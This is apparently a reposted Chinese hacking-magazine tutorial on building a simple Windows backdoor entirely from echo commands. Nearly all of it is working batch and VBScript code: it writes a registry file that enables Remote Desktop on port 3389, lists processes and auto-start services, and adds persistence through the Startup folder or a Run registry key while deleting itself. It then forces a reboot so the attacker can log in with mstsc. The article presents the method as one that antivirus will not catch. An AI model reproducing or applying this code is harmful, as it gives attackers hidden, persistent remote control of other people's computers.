| 关键词: nbsp echo 3389 reg MACHINE LOCAL CurrentControlSe HKEY vbs Hackcome |
原创首发:黑客警线 作者:邃离 以前看过篇文章--“永不会被查杀的后门”,用到了批处理编程。思路还算可以,就是让后门 每过一段时间就会自动重新启动,并且完全命令实现,杀毒的是不会怀疑的。 我们今天来完全的用echo命令来实现,一个简单后门的例子。 //得到admin权限,方便利用,编写开启共享和开启3389或者telnet等 //开彷举一例开自启动开启3389 code: //输出为open3389.bat echo Windows Registry Editor Version 5.00 >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg echo "Enabled"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg echo "ShutdownWithoutLogon"="0" >>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg echo "Start"=dword:00000002 >>3389.reg echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg echo "Hotkey"="1" >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg echo "PortNumber"=dword:00000D3D >>3389.reg //输出为listPID.bat,和以上结合,分别运行。 code: echo wscript.echo "PID ProcessName">>1.vbe echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe echo next>>1.vbe //列举子启动项目 Code: @echo for each hc in getobject("winmgmts:\\.\root\cimv2:win32_service").instances_ >hc.vbs @echo if hc.startmode="Auto" then wscript.echo hc.name^&" - "^&sc.pathname >>hc.vbs @echo next >>hc.vbs & cscript //nologo hc.vbs & del hc.vbs //两种方法实现自启动,选一种即可 CODE: @echo off @copy %0 "%userprofile%\「开始」菜单\程序\启动" @del %0 CODE: @echo off @copy %0 d:\autoexec.bat @REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d d:\autoexec.bat /f " @del %0 //为了方便,重新启动系统 Code: @echo for each os in getobject _ >Hackcome.vbs @echo ("winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem").instances_ >>hackcome.vbs @echo os.win32shutdown(2):next >>hackcome.vbs & cscript //nologo hackcome.vbs & del hackcome.vbs //mstsc进入电脑 但这种方法太简单,所以易被管理员忽略,因为同样运用逆向的思路。值得思考的是,可以举一反三,因为只是演示,不带写复杂的应用了。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|